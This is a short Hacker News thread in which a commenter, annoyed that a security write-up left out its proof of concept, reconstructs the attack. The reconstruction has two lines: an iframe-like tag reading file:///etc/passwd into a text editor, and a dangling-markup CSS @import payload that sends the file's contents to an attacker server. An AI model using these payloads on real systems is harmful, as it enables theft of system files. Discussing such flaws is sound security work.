Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

> I will not leave a PoC for this chapter but I promise you, it will not be that difficult to figure out after reading the above two parts

I find this kind of annoying. Either write about the vulnerability or don't.



So... First vulnerability is that you can force someone to hit

2nd vulnerability is that you can print a password file (or other file) inside the text editor

<iframedoc src="file:///etc/passwd">

A dangling markup attack is an attack that sends you information as part of the url request up to the next quote

So you could do this and someone has sent you the contents of the password file when trying to get css

<style>@import{ "file:///net/MYSERVER.COM/stealpassword.css?=<iframedoc src="file:///etc/passwd">"} </style>


Which is very interesting in and of itself as that's not how dangaling markup attacks usually work (normally it would send the unparsed html, not the result of parsing the html). Not to mention wtf the non-standard <iframedoc> tag is and how it differs from an iframe.

But my broader point was less the how, and more that the style of writing was obnoxious.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: